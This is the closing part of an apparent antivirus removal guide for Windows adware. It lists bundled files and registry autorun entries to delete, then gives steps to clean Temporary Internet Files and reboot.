    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WDJDriverPreinstaller.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ApkReg.exe (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb32.ime (8657 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\卸载光速输入法.lnk (792 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Statistics.dll (3361 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Tool.exe (4185 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb64.ime (14022 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\¿ìÀÖÅ®º¢.gss (46 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\À¶É«±ù¸ñ.gss (34 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\ÐÝÏÐ.gss (601 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SoftApp.ini (281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\¿ìÀÖÅ®º¢.gss (46 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\aapt.exe (45940 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Wizard.exe (17627 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\MBManager.exe (7971 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Expand.dll (10815 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\输入法管理器.lnk (797 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\uninst.exe (1425 bytes)
    %Program Files%\gssoft\gswb\官方网站.url (230 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg64.exe (1281 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\在线升级.lnk (785 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\À¶É«±ù¸ñ.gss (34 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Power.exe (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeUtil.exe (14022 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Config.exe (8281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\»·±£ÂÌ.gss (42 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjRelated.dll (9098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAY2V666.htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].ashx (3 bytes)
    %Program Files%\wjplay2\20140507132818\Data\Err.html (1 bytes)
    %Program Files%\wjplay2\20140507132818\Data\err.jpg (784 bytes)
    %Program Files%\wjplay2\20140507132818\Data\def.jpg (1552 bytes)
    %Program Files%\wjplay2\20140507132818\Data\User2.ini (60 bytes)
    %Program Files%\wjplay2\20140507132818\Unins.exe (10136 bytes)
    %Program Files%\wjplay2\20140507132818\Data\wj.ico (784 bytes)
    %Program Files%\wjplay2\20140507132818\wjplay.exe (12088 bytes)
    %Program Files%\wjplay2\20140507132818\playlist.xml (53 bytes)
    %Program Files%\wjplay2\20140507132818\DuiLib.dll (16288 bytes)
    %Program Files%\wjplay2\20140507132818\bottom.xml (67 bytes)
    %Program Files%\wjplay2\20140507132818\Data\Def.html (902 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\ÅäÖù¤¾ß\жÔØwjplay2.lnk (847 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\¹Ù·½Ö÷Ò³.lnk (332 bytes)
    %Program Files%\wjplay2\20140507132818\Data\loading.gif (8 bytes)
    %Program Files%\wjplay2\20140507132818\Data\poptime_bg.png (1 bytes)
    %Program Files%\wjplay2\20140507132818\locallist.xml (167 bytes)
    %Program Files%\wjplay2\20140507132818\client.ini (1 bytes)
    %Program Files%\wjplay2\20140507132818\SysConfig.ini (2125 bytes)
    %Program Files%\wjplay2\20140507132818\PlayerUpdate.exe (5520 bytes)
    %Documents and Settings%\All Users\Desktop\wjplay2.lnk (828 bytes)
    %Program Files%\wjplay2\20140507132818\WJSpeed.exe (23424 bytes)
    %Program Files%\wjplay2\20140507132818\server.ini (1 bytes)
    %Program Files%\wjplay2\20140507132818\stat.ini (1 bytes)
    %Program Files%\wjplay2\20140507132818\Data\tab_more.png (4 bytes)
    %Program Files%\wjplay2\20140507132818\Data\EKanR.dat (10136 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\wjplay2.lnk (840 bytes)
    %Program Files%\vsgrtaho\hzsoft\IFoxInstall-y-c203945859-run-s-x.exe (9565 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\IFoxInstall-y-c203945859-run-s-x[1].exe (8818 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Expand.dll (10815 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Service.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\WdjEngine.dll (14988 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\3026bf8d9e37080c8abcaaf6df47dbf3.exe (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\tj2[1].ashx (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\WJXMDT\DMSet.Xml (215 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
    %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AList[1].xml (62 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "GSMutualRunOne" = "%Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe RestartRunOneProgram"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "YYMusic3_2014050713" = "%Program Files%\YYMusic3\2014050713\YYMusic2.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "YYMusic3_News_2014050713" = "%Program Files%\YYMusic3\2014050713\YYSpeed2.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "wjplay2_News_20140507132818" = "%Program Files%\wjplay2\20140507132818\WJSpeed.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "wjplay2_20140507132818" = "%Program Files%\wjplay2\20140507132818\wjplay.exe -mini"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.